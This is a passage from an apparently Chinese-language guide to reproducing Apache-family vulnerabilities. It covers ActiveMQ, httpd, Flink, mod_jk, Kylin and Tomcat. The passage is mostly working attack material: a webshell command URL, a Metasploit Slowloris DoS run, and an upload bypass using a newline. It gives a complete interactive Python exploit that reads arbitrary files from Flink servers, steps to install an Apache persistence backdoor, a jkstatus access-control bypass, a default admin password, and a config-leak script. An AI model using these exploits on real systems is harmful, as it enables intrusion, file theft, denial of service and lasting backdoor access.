</span><span style=color:#960050;background-color:#1e0010>Authorization: Basic YWRtaW46YWRtaW4=
</span><span style=color:#960050;background-color:#1e0010>Upgrade-Insecure-Requests: 1
</span><span style=color:#960050;background-color:#1e0010>User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
</span><span style=color:#960050;background-color:#1e0010>Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
</span><span style=color:#960050;background-color:#1e0010>Accept-Encoding: gzip, deflate
</span><span style=color:#960050;background-color:#1e0010>Accept-Language: zh-CN,zh;q=0.9
</span><span style=color:#960050;background-color:#1e0010>If-Modified-Since: Fri, 13 Feb 2015 18:05:11 GMT
</span><span style=color:#960050;background-color:#1e0010>Connection: close
</span></code></pre></div><p>响应包如下:</p><div class=highlight><pre style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-http data-lang=http><span style=color:#66d9ef>HTTP</span><span style=color:#f92672>/</span><span style=color:#ae81ff>1.1</span> <span style=color:#ae81ff>204</span> <span style=color:#a6e22e>No Content</span>
Connection<span style=color:#f92672>:</span> <span style=color:#ae81ff>close</span>
Server<span style=color:#f92672>:</span> <span style=color:#ae81ff>Jetty(8.1.16.v20140903)</span>
</code></pre></div><p>此时我们就可以使用<code>webshell</code>了:<code>http://&lt;ip>:8161/admin/a.jsp?cmd=ls</code>。</p><h3 id=ddos-cve-2007-6750>DDOS CVE-2007-6750<a hidden class=anchor aria-hidden=true href=#ddos-cve-2007-6750>#</a></h3><h4 id=漏洞描述-4>漏洞描述<a hidden class=anchor aria-hidden=true href=#漏洞描述-4>#</a></h4><p><code>Apache HTTP服务器2.2.15</code>之前版本中缺少<code>mod_ReqTimeout</code>模块，<code>1.x</code>和<code>2.x</code>允许远程攻击者通过部分<code>HTTP</code>请求导致拒绝服务(守护进程中断)，如<code>Slowloris</code>。</p><h4 id=影响版本-4>影响版本<a hidden class=anchor aria-hidden=true href=#影响版本-4>#</a></h4><p><code>Apache 1.x ~ 2.x</code></p><h4 id=复现思路-4>复现思路<a hidden class=anchor aria-hidden=true href=#复现思路-4>#</a></h4><p>检查存活。</p><p>msf进一步验证。</p><h4 id=漏洞复现-4>漏洞复现<a hidden class=anchor aria-hidden=true href=#漏洞复现-4>#</a></h4><p>首先使用nmap查看Apache版本:</p><div class=highlight><pre style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash>nmap -sV -p80 &lt;ip&gt;
</code></pre></div><p>然后进一步访问网页，查看网页是否正常。</p><p>使用msf执行攻击:</p><pre><code>msfconsole # 启动metasploit
use auxiliary/dos/http/slowloris # 使用模块
set RHOST &lt;ip&gt; # 设置目标IP
run # 执行攻击
</code></pre><h3 id=httpd-换行解析漏洞-cve-2017-15715>HTTPd 换行解析漏洞 CVE-2017-15715<a hidden class=anchor aria-hidden=true href=#httpd-换行解析漏洞-cve-2017-15715>#</a></h3><h4 id=漏洞描述-5>漏洞描述<a hidden class=anchor aria-hidden=true href=#漏洞描述-5>#</a></h4><p><code>Apache HTTPd</code>是一款<code>HTTP</code>服务器，它可以通过<code>mod_php</code>来运行<code>PHP</code>网页。其<code>2.4.0 ~ 2.4.29</code>版本中存在一个解析漏洞，在解析<code>PHP</code>时，<code>1.php\x0A</code>将被按照<code>PHP</code>后缀进行解析，导致绕过一些服务器的安全策略。</p><h4 id=影响版本-5>影响版本<a hidden class=anchor aria-hidden=true href=#影响版本-5>#</a></h4><p><code>Apache HTTPd 2.4.0 ~ 2.4.29</code></p><h4 id=复现思路-5>复现思路<a hidden class=anchor aria-hidden=true href=#复现思路-5>#</a></h4><p>抓包给文件后缀加上<code>0a</code>换行符。</p><h4 id=漏洞复现-5>漏洞复现<a hidden class=anchor aria-hidden=true href=#漏洞复现-5>#</a></h4><p>环境搭建:</p><div class=highlight><pre style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash>git clone https://github.com/vulhub/vulhub.git
cd vulhub/httpd/CVE-2017-15715
docker-compose up -d
</code></pre></div><p>直接点击上传文件会被拦截，查看配置文件如下:</p><pre><code>&lt;FilesMatch \.php$&gt;
	SetHandler application/x-httpd-php
&lt;/FilesMatch&gt;

DirectoryIndex disabled
DirectoryIndex index.php index.html

&lt;Directory /var/www/&gt;
	Options -Indexes
	AllowOverride All
&lt;/Directory&gt;
</code></pre><p>前三行配置是将以<code>.php</code>为后缀的文件内容当作<code>PHP</code>代码进行解析，但使用了<code>$</code>进行文件匹配。</p><p><code>$</code>在正则表达式中是匹配字符串中结尾的位置，若存在换行符，则匹配换行符为结尾，可以通过这个缺陷绕过黑名单机制实现文件上传。</p><p>抓包发送至<code>Repeater</code>模块，在文件后缀加上<code>%0a</code>绕过限制，上传成功，访问<code>http://&lt;ip>:&lt;port>/test.php%0a</code>成功触发解析漏洞。</p><h3 id=flink-目录遍历漏洞-cve-2020-17519>Flink 目录遍历漏洞 CVE-2020-17519<a hidden class=anchor aria-hidden=true href=#flink-目录遍历漏洞-cve-2020-17519>#</a></h3><h4 id=漏洞描述-6>漏洞描述<a hidden class=anchor aria-hidden=true href=#漏洞描述-6>#</a></h4><p>远程攻击者通过<code>REST API</code>目录遍历，可造成<strong>文件读取/写入</strong>的影响。</p><h4 id=影响版本-6>影响版本<a hidden class=anchor aria-hidden=true href=#影响版本-6>#</a></h4><p><code>Apache Flink 1.11.0 ~ 1.11.2</code></p><h4 id=复现思路-6>复现思路<a hidden class=anchor aria-hidden=true href=#复现思路-6>#</a></h4><h4 id=漏洞复现-6>漏洞复现<a hidden class=anchor aria-hidden=true href=#漏洞复现-6>#</a></h4><p><code>FOFA</code>:<code>app="Apache Flink"</code></p><p>环境搭建:<a href=https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17519>vulhub/flink/CVE-2020-17519 at master · vulhub/vulhub (github.com)</a></p><p><code>POC</code>:</p><pre><code>http://&lt;ip&gt;/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
</code></pre><p>漏洞利用<code>POC</code>:</p><div class=highlight><pre style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-python data-lang=python><span style=color:#f92672>import</span> requests
<span style=color:#f92672>import</span> sys
<span style=color:#f92672>import</span> json
<span style=color:#f92672>from</span> requests.packages.urllib3.exceptions <span style=color:#f92672>import</span> InsecureRequestWarning

<span style=color:#66d9ef>def</span> <span style=color:#a6e22e>title</span>():
    <span style=color:#66d9ef>print</span>(<span style=color:#e6db74>&#39;+------------------------------------------&#39;</span>)
    <span style=color:#66d9ef>print</span>(<span style=color:#e6db74>&#39;+  </span><span style=color:#ae81ff>\033</span><span style=color:#e6db74>[34mPOC_Des: http://wiki.peiqi.tech                                   </span><span style=color:#ae81ff>\033</span><span style=color:#e6db74>[0m&#39;</span>)
    <span style=color:#66d9ef>print</span>(<span style=color:#e6db74>&#39;+  </span><span style=color:#ae81ff>\033</span><span style=color:#e6db74>[34mGithub : https://github.com/PeiQi0                                 </span><span style=color:#ae81ff>\033</span><span style=color:#e6db74>[0m&#39;</span>)
    <span style=color:#66d9ef>print</span>(<span style=color:#e6db74>&#39;+  </span><span style=color:#ae81ff>\033</span><span style=color:#e6db74>[34m公众号 : PeiQi文库                                                     </span><span style=color:#ae81ff>\033</span><span style=color:#e6db74>[0m&#39;</span>)
    <span style=color:#66d9ef>print</span>(<span style=color:#e6db74>&#39;+  </span><span style=color:#ae81ff>\033</span><span style=color:#e6db74>[34mVersion: Apache Flink   1.11.0-1.11.2                             </span><span style=color:#ae81ff>\033</span><span style=color:#e6db74>[0m&#39;</span>)
    <span style=color:#66d9ef>print</span>(<span style=color:#e6db74>&#39;+  </span><span style=color:#ae81ff>\033</span><span style=color:#e6db74>[36m使用格式: python3 CVE-2020-17519.py                                  </span><span style=color:#ae81ff>\033</span><span style=color:#e6db74>[0m&#39;</span>)
    <span style=color:#66d9ef>print</span>(<span style=color:#e6db74>&#39;+  </span><span style=color:#ae81ff>\033</span><span style=color:#e6db74>[36mUrl         &gt;&gt;&gt; http://xxx.xxx.xxx.xxx                             </span><span style=color:#ae81ff>\033</span><span style=color:#e6db74>[0m&#39;</span>)
    <span style=color:#66d9ef>print</span>(<span style=color:#e6db74>&#39;+  </span><span style=color:#ae81ff>\033</span><span style=color:#e6db74>[36mFile        &gt;&gt;&gt; /etc/passwd                                        </span><span style=color:#ae81ff>\033</span><span style=color:#e6db74>[0m&#39;</span>)
    <span style=color:#66d9ef>print</span>(<span style=color:#e6db74>&#39;+------------------------------------------&#39;</span>)

<span style=color:#66d9ef>def</span> <span style=color:#a6e22e>POC_1</span>(target_url, file_name):
    file_name <span style=color:#f92672>=</span> file_name<span style=color:#f92672>.</span>replace(<span style=color:#e6db74>&#34;/&#34;</span>, <span style=color:#e6db74>&#34;</span><span style=color:#e6db74>%252f</span><span style=color:#e6db74>&#34;</span>)
    vuln_url <span style=color:#f92672>=</span> target_url <span style=color:#f92672>+</span> <span style=color:#e6db74>&#34;/jobmanager/logs/..</span><span style=color:#e6db74>%252f</span><span style=color:#e6db74>..</span><span style=color:#e6db74>%252f</span><span style=color:#e6db74>..</span><span style=color:#e6db74>%252f</span><span style=color:#e6db74>..</span><span style=color:#e6db74>%252f</span><span style=color:#e6db74>..</span><span style=color:#e6db74>%252f</span><span style=color:#e6db74>..</span><span style=color:#e6db74>%252f</span><span style=color:#e6db74>..</span><span style=color:#e6db74>%252f</span><span style=color:#e6db74>..</span><span style=color:#e6db74>%252f</span><span style=color:#e6db74>..</span><span style=color:#e6db74>%252f</span><span style=color:#e6db74>..</span><span style=color:#e6db74>%252f</span><span style=color:#e6db74>..</span><span style=color:#e6db74>%252f</span><span style=color:#e6db74>..{}&#34;</span><span style=color:#f92672>.</span>format(file_name)
    headers <span style=color:#f92672>=</span> {
        <span style=color:#e6db74>&#34;User-Agent&#34;</span>: <span style=color:#e6db74>&#34;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36&#34;</span>,
    }
    <span style=color:#66d9ef>try</span>:
        requests<span style=color:#f92672>.</span>packages<span style=color:#f92672>.</span>urllib3<span style=color:#f92672>.</span>disable_warnings(InsecureRequestWarning)
        response <span style=color:#f92672>=</span> requests<span style=color:#f92672>.</span>get(url<span style=color:#f92672>=</span>vuln_url, timeout<span style=color:#f92672>=</span><span style=color:#ae81ff>10</span>, verify<span style=color:#f92672>=</span>False, headers<span style=color:#f92672>=</span>headers)
        <span style=color:#66d9ef>print</span>(<span style=color:#e6db74>&#34;</span><span style=color:#ae81ff>\033</span><span style=color:#e6db74>[32m[o] 请求URL ： {}</span><span style=color:#ae81ff>\033</span><span style=color:#e6db74>[0m&#34;</span><span style=color:#f92672>.</span>format(vuln_url))
        <span style=color:#66d9ef>if</span> <span style=color:#e6db74>&#34;root&#34;</span> <span style=color:#f92672>in</span> response<span style=color:#f92672>.</span>text:
            <span style=color:#66d9ef>print</span>(<span style=color:#e6db74>&#34;</span><span style=color:#ae81ff>\033</span><span style=color:#e6db74>[32m[o] 目标 {} 存在漏洞,成功读取 /etc/passwd ，响应为:</span><span style=color:#ae81ff>\n</span><span style=color:#e6db74>{}</span><span style=color:#ae81ff>\033</span><span style=color:#e6db74>[0m&#34;</span><span style=color:#f92672>.</span>format(target_url, response<span style=color:#f92672>.</span>text))
        <span style=color:#66d9ef>else</span> :
            <span style=color:#66d9ef>print</span>(<span style=color:#e6db74>&#34;</span><span style=color:#ae81ff>\033</span><span style=color:#e6db74>[31m[x] 目标Url漏洞利用失败</span><span style=color:#ae81ff>\033</span><span style=color:#e6db74>[0m&#34;</span>)
            sys<span style=color:#f92672>.</span>exit(<span style=color:#ae81ff>0</span>)

    <span style=color:#66d9ef>except</span> <span style=color:#a6e22e>Exception</span> <span style=color:#66d9ef>as</span> e:
        <span style=color:#66d9ef>print</span>(<span style=color:#e6db74>&#34;</span><span style=color:#ae81ff>\033</span><span style=color:#e6db74>[31m[x] 目标Url漏洞利用失败</span><span style=color:#ae81ff>\033</span><span style=color:#e6db74>[0m&#34;</span>)
        sys<span style=color:#f92672>.</span>exit(<span style=color:#ae81ff>0</span>)

<span style=color:#66d9ef>def</span> <span style=color:#a6e22e>POC_2</span>(target_url, file_name):
    file_name_re <span style=color:#f92672>=</span> file_name<span style=color:#f92672>.</span>replace(<span style=color:#e6db74>&#34;/&#34;</span>, <span style=color:#e6db74>&#34;</span><span style=color:#e6db74>%252f</span><span style=color:#e6db74>&#34;</span>)
    vuln_url <span style=color:#f92672>=</span> target_url <span style=color:#f92672>+</span> <span style=color:#e6db74>&#34;/jobmanager/logs/..</span><span style=color:#e6db74>%252f</span><span style=color:#e6db74>..</span><span style=color:#e6db74>%252f</span><span style=color:#e6db74>..</span><span style=color:#e6db74>%252f</span><span style=color:#e6db74>..</span><span style=color:#e6db74>%252f</span><span style=color:#e6db74>..</span><span style=color:#e6db74>%252f</span><span style=color:#e6db74>..</span><span style=color:#e6db74>%252f</span><span style=color:#e6db74>..</span><span style=color:#e6db74>%252f</span><span style=color:#e6db74>..</span><span style=color:#e6db74>%252f</span><span style=color:#e6db74>..</span><span style=color:#e6db74>%252f</span><span style=color:#e6db74>..</span><span style=color:#e6db74>%252f</span><span style=color:#e6db74>..</span><span style=color:#e6db74>%252f</span><span style=color:#e6db74>..{}&#34;</span><span style=color:#f92672>.</span>format(file_name_re)
    headers <span style=color:#f92672>=</span> {
        <span style=color:#e6db74>&#34;User-Agent&#34;</span>: <span style=color:#e6db74>&#34;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36&#34;</span>,
    }
    <span style=color:#66d9ef>try</span>:
        requests<span style=color:#f92672>.</span>packages<span style=color:#f92672>.</span>urllib3<span style=color:#f92672>.</span>disable_warnings(InsecureRequestWarning)
        response <span style=color:#f92672>=</span> requests<span style=color:#f92672>.</span>get(url<span style=color:#f92672>=</span>vuln_url, timeout<span style=color:#f92672>=</span><span style=color:#ae81ff>10</span>, verify<span style=color:#f92672>=</span>False, headers<span style=color:#f92672>=</span>headers)
        <span style=color:#66d9ef>print</span>(<span style=color:#e6db74>&#34;</span><span style=color:#ae81ff>\033</span><span style=color:#e6db74>[32m[o] 请求URL ： {}</span><span style=color:#ae81ff>\033</span><span style=color:#e6db74>[0m&#34;</span><span style=color:#f92672>.</span>format(vuln_url))
        <span style=color:#66d9ef>if</span> <span style=color:#e6db74>&#34;error&#34;</span> <span style=color:#f92672>not</span> <span style=color:#f92672>in</span> response<span style=color:#f92672>.</span>text:
            <span style=color:#66d9ef>print</span>(<span style=color:#e6db74>&#34;</span><span style=color:#ae81ff>\033</span><span style=color:#e6db74>[32m[o] 目标 {} 存在漏洞,成功读取 {} ，响应为:</span><span style=color:#ae81ff>\n</span><span style=color:#e6db74>{}</span><span style=color:#ae81ff>\033</span><span style=color:#e6db74>[0m&#34;</span><span style=color:#f92672>.</span>format(target_url, file_name, response<span style=color:#f92672>.</span>text))
        <span style=color:#66d9ef>else</span> :
            <span style=color:#66d9ef>print</span>(<span style=color:#e6db74>&#34;</span><span style=color:#ae81ff>\033</span><span style=color:#e6db74>[31m[x] 目标文件{}读取失败</span><span style=color:#ae81ff>\033</span><span style=color:#e6db74>[0m&#34;</span><span style=color:#f92672>.</span>format(file_name))

    <span style=color:#66d9ef>except</span> <span style=color:#a6e22e>Exception</span> <span style=color:#66d9ef>as</span> e:
        <span style=color:#66d9ef>print</span>(<span style=color:#e6db74>&#34;</span><span style=color:#ae81ff>\033</span><span style=color:#e6db74>[31m[x] 目标Url漏洞利用失败</span><span style=color:#ae81ff>\033</span><span style=color:#e6db74>[0m&#34;</span>)
        sys<span style=color:#f92672>.</span>exit(<span style=color:#ae81ff>0</span>)

<span style=color:#66d9ef>if</span> __name__ <span style=color:#f92672>==</span> <span style=color:#e6db74>&#39;__main__&#39;</span>:
    title()
    target_url <span style=color:#f92672>=</span> str(input(<span style=color:#e6db74>&#34;</span><span style=color:#ae81ff>\033</span><span style=color:#e6db74>[35mPlease input Attack Url</span><span style=color:#ae81ff>\n</span><span style=color:#e6db74>Url   &gt;&gt;&gt; </span><span style=color:#ae81ff>\033</span><span style=color:#e6db74>[0m&#34;</span>))
    file_name <span style=color:#f92672>=</span> <span style=color:#e6db74>&#34;/etc/passwd&#34;</span>
    POC_1(target_url, file_name)

    <span style=color:#66d9ef>while</span> True:
        file_name <span style=color:#f92672>=</span> input(<span style=color:#e6db74>&#34;</span><span style=color:#ae81ff>\033</span><span style=color:#e6db74>[35mFile &gt;&gt;&gt; </span><span style=color:#ae81ff>\033</span><span style=color:#e6db74>[0m&#34;</span>)
        <span style=color:#66d9ef>if</span> file_name <span style=color:#f92672>==</span> <span style=color:#e6db74>&#34;exit&#34;</span>:
            sys<span style=color:#f92672>.</span>exit(<span style=color:#ae81ff>0</span>)
        <span style=color:#66d9ef>else</span>:
            POC_2(target_url, file_name)
</code></pre></div><p>使用方式:<code>python3 poc.py</code></p><p><code>Url >>></code>:<code>&lt;ip>:&lt;port></code></p><p><code>File >>></code>:<code>/etc/hosts</code></p><h3 id=后门维持>后门维持<a hidden class=anchor aria-hidden=true href=#后门维持>#</a></h3><h4 id=漏洞描述-7>漏洞描述<a hidden class=anchor aria-hidden=true href=#漏洞描述-7>#</a></h4><p>通过第三方脚本实现维持后门。</p><h4 id=影响版本-7>影响版本<a hidden class=anchor aria-hidden=true href=#影响版本-7>#</a></h4><h4 id=复现思路-7>复现思路<a hidden class=anchor aria-hidden=true href=#复现思路-7>#</a></h4><p>上传文件</p><p>重启服务</p><p>执行脚本</p><h4 id=漏洞复现-7>漏洞复现<a hidden class=anchor aria-hidden=true href=#漏洞复现-7>#</a></h4><p>工具下载:<a href=https://github.com/ianxtianxt/apache->ianxtianxt/apache-: apache权限维持后门 (github.com)</a></p><p>1.上传mod_backdoor.c到服务器，并执行命令</p><div class=highlight><pre style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash>apxs -i -a -c mod_backdoor.c <span style=color:#f92672>&amp;&amp;</span> service apache2 restart
</code></pre></div><p>2.控制端执行脚本</p><div class=highlight><pre style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash>python exploit.py &lt;ip&gt; <span style=color:#ae81ff>80</span>
</code></pre></div><h3 id=mod_jk-访问控制权限绕过-cve-2018-11759>Mod_jk 访问控制权限绕过 CVE-2018-11759<a hidden class=anchor aria-hidden=true href=#mod_jk-访问控制权限绕过-cve-2018-11759>#</a></h3><h4 id=漏洞描述-8>漏洞描述<a hidden class=anchor aria-hidden=true href=#漏洞描述-8>#</a></h4><p><code>Apache Tomcat JK(mod_jk) Connector</code>是美国阿帕奇(<code>Apache</code>)软件基金会的一款为<code>Apache</code>或<code>IIS</code>提供连接后台<code>Tomcat</code>的模块，为<code>Apache</code>或<code>IIS</code>服务器提供处理<code>JSP/Servlet</code>的能力。</p><p>由于<code>httpd</code>和<code>Tomcat</code>在路径处理规范上存在差异，<code>httpd</code>将<code>url</code>中的分号视作路径解析中的普通字符，而<code>Tomcat</code>将其当作查询分隔符(类似"?")。如，攻击者获取到路径:<code>http://server/java_app/.. ;</code>，对<code>httpd</code>来说，这并不会触发服务器并跳转到相应目录，仅仅被原封不动转发到<code>Tomcat</code>，且地址尾部被解析为<code>.. *</code>。这就允许攻击者获取到本不能在<code>Tomcat</code>访问的资源。</p><p><code>jkstatus</code>是<code>mod_jk</code>模块的管理界面，设为读写权限时，允许配置<code>AJP</code>连接<code>Java Web</code>服务器代理<code>HTTP请求</code>，我们可以绕过<code>Apache mod_jk Connector</code>由<code>JkMount httpd</code>指令所定义端点的访问控制限制。如果能访问一个只有只读权限的<code>jkstatus</code>的接口，那么就有可能能够公开由<code>mod_jk</code>模块给<code>AJP</code>提供服务的内部路由。 如果能访问一个具有读写权限的<code>jkstatus</code>接口，我们就能通过修改<code>AJP</code>的配置文件中相关配置来劫持或者截断所有经过<code>mod_jk</code>的流量，或者进行内部端口扫描。</p><h4 id=影响版本-8>影响版本<a hidden class=anchor aria-hidden=true href=#影响版本-8>#</a></h4><p><code>Apache Mod_jk Connector 1.2.0 ~ 1.2.44</code></p><h4 id=复现思路-8>复现思路<a hidden class=anchor aria-hidden=true href=#复现思路-8>#</a></h4><h4 id=漏洞复现-8>漏洞复现<a hidden class=anchor aria-hidden=true href=#漏洞复现-8>#</a></h4><p>环境搭建:</p><div class=highlight><pre style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash>git clone https://github.com/immunIT/CVE-2018-11759.git
docker-compose up -d
</code></pre></div><p>访问<code>http://&lt;ip>:80</code>成功后，访问<code>http://&lt;ip>:80/jkstatus</code>，显示无权限，通常使用如下httpd指令限制对jkstatus的访问:</p><pre><code>&lt;Location /jkstatus&gt;
JKMount jk-status
Require ip 127.0.0.1
&lt;/Location&gt;
</code></pre><p>在<code>URL</code>后加一个分号即可绕过限制，<code>http://&lt;ip>:80/jkstatus;</code>。</p><p>我们还可在分号之后提交GET参数，向jkstatus请求修改其访问权限的配置，如:<code>http://&lt;ip>:80/jkstatus;?cmd=dump</code>。</p><p>参数若能被解析，其产生的影响就等同于更改工作人员使用的端口来实现对所有由<code>mod_jk</code>供应的应用程序拒绝服务的效果，此外，若攻击者将相应<code>AJP</code>连接到自己的服务器上，就可能劫持所有到由<code>mod_jk</code>供应服务的<code>Web应用</code>的流量。</p><p>从理论上说，将<code>AJP</code>的目标和端口修改为内部主机及其对应端口后，由于<code>httpd</code>和<code>Tomcat</code>的<code>jkstatus</code>返回错误信息不一致，我们能进行内部<code>TCP</code>端口扫描，具体情况取决于提交的<code>AJP</code>端口是否有效。</p><h3 id=kylin-console-控制台弱口令>Kylin Console 控制台弱口令<a hidden class=anchor aria-hidden=true href=#kylin-console-控制台弱口令>#</a></h3><h4 id=漏洞描述-9>漏洞描述<a hidden class=anchor aria-hidden=true href=#漏洞描述-9>#</a></h4><p>默认弱口令<code>admin/KYLIN</code>。</p><h4 id=影响版本-9>影响版本<a hidden class=anchor aria-hidden=true href=#影响版本-9>#</a></h4><p><code>Apache Kylin</code></p><h4 id=复现思路-9>复现思路<a hidden class=anchor aria-hidden=true href=#复现思路-9>#</a></h4><h4 id=漏洞复现-9>漏洞复现<a hidden class=anchor aria-hidden=true href=#漏洞复现-9>#</a></h4><p>打开站点输入默认账密。</p><h3 id=kylin-未授权配置泄露-cve-2020-13937>Kylin 未授权配置泄露 CVE-2020-13937<a hidden class=anchor aria-hidden=true href=#kylin-未授权配置泄露-cve-2020-13937>#</a></h3><h4 id=漏洞描述-10>漏洞描述<a hidden class=anchor aria-hidden=true href=#漏洞描述-10>#</a></h4><p><code>Apache Kylin</code>有一个<code>restful api</code>会在没有任何认证的情况下暴露配置信息。</p><h4 id=影响版本-10>影响版本<a hidden class=anchor aria-hidden=true href=#影响版本-10>#</a></h4><p><code>Apahche Kylin 2.x.x</code></p><p><code>Apahche Kylin &lt;= 3.1.0</code></p><p><code>Apahche Kylin 4.0.0-alpha</code></p><h4 id=复现思路-10>复现思路<a hidden class=anchor aria-hidden=true href=#复现思路-10>#</a></h4><h4 id=漏洞复现-10>漏洞复现<a hidden class=anchor aria-hidden=true href=#漏洞复现-10>#</a></h4><p><code>POC</code>:<code>http://&lt;ip>/kylin/api/admin/config</code></p><p>漏洞检测<code>POC</code>:</p><div class=highlight><pre style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-python data-lang=python><span style=color:#f92672>import</span> requests

<span style=color:#66d9ef>def</span> <span style=color:#a6e22e>title</span>():
    <span style=color:#66d9ef>print</span>(<span style=color:#e6db74>&#39;+------------------------------------------&#39;</span>)
    <span style=color:#66d9ef>print</span>(<span style=color:#e6db74>&#39;+  </span><span style=color:#ae81ff>\033</span><span style=color:#e6db74>[34mPOC_Des: http://wiki.peiqi.tech                                   </span><span style=color:#ae81ff>\033</span><span style=color:#e6db74>[0m&#39;</span>)
    <span style=color:#66d9ef>print</span>(<span style=color:#e6db74>&#39;+  </span><span style=color:#ae81ff>\033</span><span style=color:#e6db74>[34mGithub : https://github.com/PeiQi0                                 </span><span style=color:#ae81ff>\033</span><span style=color:#e6db74>[0m&#39;</span>)
    <span style=color:#66d9ef>print</span>(<span style=color:#e6db74>&#39;+  </span><span style=color:#ae81ff>\033</span><span style=color:#e6db74>[34m公众号 : PeiQi文库                                                     </span><span style=color:#ae81ff>\033</span><span style=color:#e6db74>[0m&#39;</span>)
    <span style=color:#66d9ef>print</span>(<span style=color:#e6db74>&#39;+  </span><span style=color:#ae81ff>\033</span><span style=color:#e6db74>[34mVersion: Apache Kylin 2.x.x &lt;= 3.1.0 Kylin 4.0.0-alpha            </span><span style=color:#ae81ff>\033</span><span style=color:#e6db74>[0m&#39;</span>)
    <span style=color:#66d9ef>print</span>(<span style=color:#e6db74>&#39;+  </span><span style=color:#ae81ff>\033</span><span style=color:#e6db74>[36m使用格式: python3 cve-2019-13937.py                                 </span><span style=color:#ae81ff>\033</span><span style=color:#e6db74>[0m&#39;</span>)
    <span style=color:#66d9ef>print</span>(<span style=color:#e6db74>&#39;+  </span><span style=color:#ae81ff>\033</span><span style=color:#e6db74>[36mUrl    &gt;&gt;&gt; http://xxx.xxx.xxx.xxx:9999                            </span><span style=color:#ae81ff>\033</span><span style=color:#e6db74>[0m&#39;</span>)
    <span style=color:#66d9ef>print</span>(<span style=color:#e6db74>&#39;+------------------------------------------&#39;</span>)

<span style=color:#66d9ef>def</span> <span style=color:#a6e22e>POC_1</span>(target_url):
    vuln_url <span style=color:#f92672>=</span> target_url <span style=color:#f92672>+</span> <span style=color:#e6db74>&#34;/kylin/api/admin/config&#34;</span>
    headers <span style=color:#f92672>=</span> {
        <span style=color:#e6db74>&#34;User-Agent&#34;</span>: <span style=color:#e6db74>&#34;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36&#34;</span>
    }
    <span style=color:#66d9ef>try</span>:
        response <span style=color:#f92672>=</span> requests<span style=color:#f92672>.</span>get(url<span style=color:#f92672>=</span>vuln_url, headers<span style=color:#f92672>=</span>headers, timeout<span style=color:#f92672>=</span><span style=color:#ae81ff>20</span>)
        <span style=color:#66d9ef>if</span> <span style=color:#e6db74>&#34;config&#34;</span> <span style=color:#f92672>in</span> response<span style=color:#f92672>.</span>text:
            <span style=color:#66d9ef>print</span>(<span style=color:#e6db74>&#34;</span><span style=color:#ae81ff>\033</span><span style=color:#e6db74>[32m[o] 存在Apache Kylin的未授权配置泄露</span><span style=color:#ae81ff>\n</span><span style=color:#e6db74>[o] 响应为:</span><span style=color:#ae81ff>\n\033</span><span style=color:#e6db74>[0m&#34;</span>,response<span style=color:#f92672>.</span>text)
        <span style=color:#66d9ef>else</span>:
            <span style=color:#66d9ef>print</span>(<span style=color:#e6db74>&#34;</span><span style=color:#ae81ff>\033</span><span style=color:#e6db74>[31m[x] 目标Url漏洞利用失败</span><span style=color:#ae81ff>\033</span><span style=color:#e6db74>[0m&#34;</span>)
    <span style=color:#66d9ef>except</span>:
        <span style=color:#66d9ef>print</span>(<span style=color:#e6db74>&#34;</span><span style=color:#ae81ff>\033</span><span style=color:#e6db74>[31m[x] 目标Url漏洞利用失败</span><span style=color:#ae81ff>\033</span><span style=color:#e6db74>[0m&#34;</span>)

<span style=color:#66d9ef>if</span> __name__ <span style=color:#f92672>==</span> <span style=color:#e6db74>&#39;__main__&#39;</span>:
    title()
    target_url <span style=color:#f92672>=</span> str(input(<span style=color:#e6db74>&#34;</span><span style=color:#ae81ff>\033</span><span style=color:#e6db74>[35mPlease input Attack Url</span><span style=color:#ae81ff>\n</span><span style=color:#e6db74>Url &gt;&gt;&gt; </span><span style=color:#ae81ff>\033</span><span style=color:#e6db74>[0m&#34;</span>))
    POC_1(target_url)
</code></pre></div><h3 id=rce-cve-2017-12615>RCE CVE-2017-12615<a hidden class=anchor aria-hidden=true href=#rce-cve-2017-12615>#</a></h3><h4 id=漏洞描述-11>漏洞描述<a hidden class=anchor aria-hidden=true href=#漏洞描述-11>#</a></h4><p><code>conf/web.xml</code>文件配置错误中的<code>readonly</code>参数默认为<code>false</code>，攻击者可以使用<code>PUT/DELETE</code>请求方法操作文件。如通过精心构造的攻击请求数据包向服务器上传包含任意代码的<code>JSP</code>文件，<code>JSP</code>文件中的恶意代码将能被服务器执行，导致服务器数据泄露或获取服务器权限。</p><h4 id=影响版本-11>影响版本<a hidden class=anchor aria-hidden=true href=#影响版本-11>#</a></h4><p><code>Apache Tomcat 7.0.0 ~ 7.0.81</code></p><h4 id=复现思路-11>复现思路<a hidden class=anchor aria-hidden=true href=#复现思路-11>#</a></h4><p><code>msf</code>生成<code>jsp</code>马</p><p><code>PUT</code>上传文件</p><h4 id=漏洞复现-11>漏洞复现<a hidden class=anchor aria-hidden=true href=#漏洞复现-11>#</a></h4><p>环境搭建:</p><div class=highlight><pre style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash>gitclone 